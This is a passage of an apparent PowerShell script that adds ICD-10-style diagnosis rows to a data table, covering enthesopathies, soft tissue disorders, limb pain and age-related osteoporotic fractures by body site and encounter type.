$DiagnosisList.Rows.Add("Peroneal tendinitis","Peroneal tendinitis, unspecified leg") + $null = $DiagnosisList.Rows.Add("Peroneal tendinitis","Peroneal tendinitis, right leg") + $null = $DiagnosisList.Rows.Add("Peroneal tendinitis","Peroneal tendinitis, left leg") + $null = $DiagnosisList.Rows.Add("Anterior tibial syndrome","Anterior tibial syndrome, right leg") + $null = $DiagnosisList.Rows.Add("Anterior tibial syndrome","Anterior tibial syndrome, left leg") + $null = $DiagnosisList.Rows.Add("Anterior tibial syndrome","Anterior tibial syndrome, unspecified leg") + $null = $DiagnosisList.Rows.Add("Posterior tibial tendinitis","Posterior tibial tendinitis, right leg") + $null = $DiagnosisList.Rows.Add("Posterior tibial tendinitis","Posterior tibial tendinitis, left leg") + $null = $DiagnosisList.Rows.Add("Posterior tibial tendinitis","Posterior tibial tendinitis, unspecified leg") + $null = $DiagnosisList.Rows.Add("Other specified enthesopathies of lower limb, excluding foot","Other specified enthesopathies of right lower limb, excluding foot") + $null = $DiagnosisList.Rows.Add("Other specified enthesopathies of lower limb, excluding foot","Other specified enthesopathies of left lower limb, excluding foot") + $null = $DiagnosisList.Rows.Add("Other specified enthesopathies of lower limb, excluding foot","Other specified enthesopathies of unspecified lower limb, excluding foot") + $null = $DiagnosisList.Rows.Add("Unspecified enthesopathy, lower limb, excluding foot","Unspecified enthesopathy, lower limb, excluding foot") + $null = $DiagnosisList.Rows.Add("Medial epicondylitis","Medial epicondylitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Medial epicondylitis","Medial epicondylitis, right elbow") + $null = $DiagnosisList.Rows.Add("Medial epicondylitis","Medial epicondylitis, left elbow") + $null = $DiagnosisList.Rows.Add("Lateral epicondylitis","Lateral epicondylitis, unspecified elbow") + $null = $DiagnosisList.Rows.Add("Lateral epicondylitis","Lateral epicondylitis, right elbow") + $null = $DiagnosisList.Rows.Add("Lateral epicondylitis","Lateral epicondylitis, left elbow") + $null = $DiagnosisList.Rows.Add("Periarthritis of wrist","Periarthritis, unspecified wrist") + $null = $DiagnosisList.Rows.Add("Periarthritis of wrist","Periarthritis, right wrist") + $null = $DiagnosisList.Rows.Add("Periarthritis of wrist","Periarthritis, left wrist") + $null = $DiagnosisList.Rows.Add("Calcaneal spur","Calcaneal spur, unspecified foot") + $null = $DiagnosisList.Rows.Add("Calcaneal spur","Calcaneal spur, right foot") + $null = $DiagnosisList.Rows.Add("Calcaneal spur","Calcaneal spur, left foot") + $null = $DiagnosisList.Rows.Add("Metatarsalgia","Metatarsalgia, unspecified foot") + $null = $DiagnosisList.Rows.Add("Metatarsalgia","Metatarsalgia, right foot") + $null = $DiagnosisList.Rows.Add("Metatarsalgia","Metatarsalgia, left foot") + $null = $DiagnosisList.Rows.Add("Other enthesopathy of foot","Other enthesopathy of unspecified foot") + $null = $DiagnosisList.Rows.Add("Other enthesopathy of foot","Other enthesopathy of right foot") + $null = $DiagnosisList.Rows.Add("Other enthesopathy of foot","Other enthesopathy of left foot") + $null = $DiagnosisList.Rows.Add("Other enthesopathies, not elsewhere classified","Other enthesopathies, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Enthesopathy, unspecified","Enthesopathy, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Rheumatism, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Myalgia") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Neuralgia and neuritis, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Panniculitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Hypertrophy of (infrapatellar) fat pad") + $null = $DiagnosisList.Rows.Add("Other and unspecified soft tissue disorders, not elsewhere classified","Residual foreign body in soft tissue") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in right arm") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in left arm") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in arm, unspecified") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in right leg") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in left leg") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in leg, unspecified") + $null = $DiagnosisList.Rows.Add("Pain in limb, unspecified","Pain in unspecified limb") + $null = $DiagnosisList.Rows.Add("Pain in upper arm","Pain in right upper arm") + $null = $DiagnosisList.Rows.Add("Pain in upper arm","Pain in left upper arm") + $null = $DiagnosisList.Rows.Add("Pain in upper arm","Pain in unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Pain in forearm","Pain in right forearm") + $null = $DiagnosisList.Rows.Add("Pain in forearm","Pain in left forearm") + $null = $DiagnosisList.Rows.Add("Pain in forearm","Pain in unspecified forearm") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in right hand") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in left hand") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in unspecified hand") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in right finger(s)") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in left finger(s)") + $null = $DiagnosisList.Rows.Add("Pain in hand and fingers","Pain in unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Pain in thigh","Pain in right thigh") + $null = $DiagnosisList.Rows.Add("Pain in thigh","Pain in left thigh") + $null = $DiagnosisList.Rows.Add("Pain in thigh","Pain in unspecified thigh") + $null = $DiagnosisList.Rows.Add("Pain in lower leg","Pain in right lower leg") + $null = $DiagnosisList.Rows.Add("Pain in lower leg","Pain in left lower leg") + $null = $DiagnosisList.Rows.Add("Pain in lower leg","Pain in unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in right foot") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in left foot") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in unspecified foot") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in right toe(s)") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in left toe(s)") + $null = $DiagnosisList.Rows.Add("Pain in foot and toes","Pain in unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Fibromyalgia","Fibromyalgia") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of upper extremity","Nontraumatic compartment syndrome of right upper extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of upper extremity","Nontraumatic compartment syndrome of left upper extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of upper extremity","Nontraumatic compartment syndrome of unspecified upper extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of lower extremity","Nontraumatic compartment syndrome of right lower extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of lower extremity","Nontraumatic compartment syndrome of left lower extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of lower extremity","Nontraumatic compartment syndrome of unspecified lower extremity") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of abdomen","Nontraumatic compartment syndrome of abdomen") + $null = $DiagnosisList.Rows.Add("Nontraumatic compartment syndrome of other sites","Nontraumatic compartment syndrome of other sites") + $null = $DiagnosisList.Rows.Add("Other specified soft tissue disorders","Nontraumatic hematoma of soft tissue") + $null = $DiagnosisList.Rows.Add("Other specified soft tissue disorders","Other specified soft tissue disorders") + $null = $DiagnosisList.Rows.Add("Soft tissue disorder, unspecified","Soft tissue disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified site","Age-related osteoporosis with current pathological fracture, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right shoulder","Age-related osteoporosis with current pathological fracture, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left shoulder","Age-related osteoporosis with current pathological fracture, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified shoulder","Age-related osteoporosis with current pathological fracture, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right humerus","Age-related osteoporosis with current pathological fracture, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left humerus","Age-related osteoporosis with current pathological fracture, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified humerus","Age-related osteoporosis with current pathological fracture, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right forearm","Age-related osteoporosis with current pathological fracture, right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left forearm","Age-related osteoporosis with current pathological fracture, left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified forearm","Age-related osteoporosis with current pathological fracture, unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right hand","Age-related osteoporosis with current pathological fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left hand","Age-related osteoporosis with current pathological fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified hand","Age-related osteoporosis with current pathological fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right femur","Age-related osteoporosis with current pathological fracture, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left femur","Age-related osteoporosis with current pathological fracture, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified femur","Age-related osteoporosis with current pathological fracture, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right lower leg","Age-related osteoporosis with current pathological fracture, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left lower leg","Age-related osteoporosis with current pathological fracture, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified lower leg","Age-related osteoporosis with current pathological fracture, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, right ankle and foot","Age-related osteoporosis with current pathological fracture, right ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, left ankle and foot","Age-related osteoporosis with current pathological fracture, left ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Age-related osteoporosis with current pathological fracture, unspecified ankle and foot","Age-related osteoporosis with current pathological fracture, unspecified ankle and foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Age-related 